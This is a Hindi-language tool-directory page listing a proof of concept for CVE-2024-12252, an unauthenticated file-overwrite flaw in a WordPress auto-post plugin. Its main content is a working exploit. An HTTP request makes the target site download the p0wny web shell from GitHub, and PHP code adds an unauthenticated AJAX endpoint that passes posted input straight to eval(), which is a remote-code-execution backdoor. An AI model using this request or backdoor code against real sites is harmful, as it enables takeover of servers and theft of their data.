Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-12252 — SEO LAT Auto Post <= 2.2.1 - फ़ाइल अधिलेखन/अपलोड हेतु प्राधिकरण की कमी (दूरस्थ कोड निष्पादन) | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-12252
प्रमाणीकरण और प्राधिकरणपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubrandomrobbiebf/cve-2024-12252

CVE-2024-12252

SEO LAT Auto Post <= 2.2.1 - फ़ाइल अधिलेखन/अपलोड हेतु प्राधिकरण की कमी (दूरस्थ कोड निष्पादन)

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-12252

SEO LAT Auto Post <= 2.2.1 - फ़ाइल ओवरराइट/अपलोड के लिए प्राधिकरण की कमी (रिमोट कोड निष्पादन)

विवरण

WordPress के लिए SEO LAT Auto Post प्लगइन, सभी संस्करणों (2.2.1 तक और सहित) में remote_update AJAX क्रिया पर क्षमता जांच की कमी के कारण फ़ाइल ओवरराइट के प्रति संवेदनशील है। यह बिना प्रमाणीकरण के हमलावरों को seo-beginner-auto-post.php फ़ाइल को ओवरराइट करने में सक्षम बनाता है, जिसका उपयोग रिमोट कोड निष्पादन प्राप्त करने के लिए किया जा सकता है।

विवरण

  • प्रकार: plugin
  • स्लग: seo-beginner-auto-post
  • प्रभावित संस्करण: 2.2.1
  • CVSS स्कोर: 9.8
  • CVSS रेटिंग: गंभीर
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-12252
  • स्थिति: बंद

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

action=remote_update&url=https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php

यह https://wp-dev.ddev.site/wp-content/plugins/seo-beginner-auto-post/seo-beginner-auto-post.php को ओवरराइट कर देगा - मैं सलाह दूंगा कि वर्तमान प्लगइन को संशोधित करें और rce के लिए एक nopriv क्रिया जोड़ें। https://plugins.svn.wordpress.org/seo-beginner-auto-post/trunk/seo-beginner-auto-post.php

इस प्रकार एक फ़ंक्शन जोड़ें:

root@kitploit:~


// Add the AJAX action
add_action('wp_ajax_nopriv_execute_code', 'execute_code_callback');
add_action('wp_ajax_execute_code', 'execute_code_callback');

// The callback function
function execute_code_callback() {
    // Get the code to execute from the request
    $code = $_POST['code'];

    // Execute the code
    eval($code);

    // Return a success message
    echo 'Code executed successfully!';
    wp_die();
}
टूल डाउनलोड करें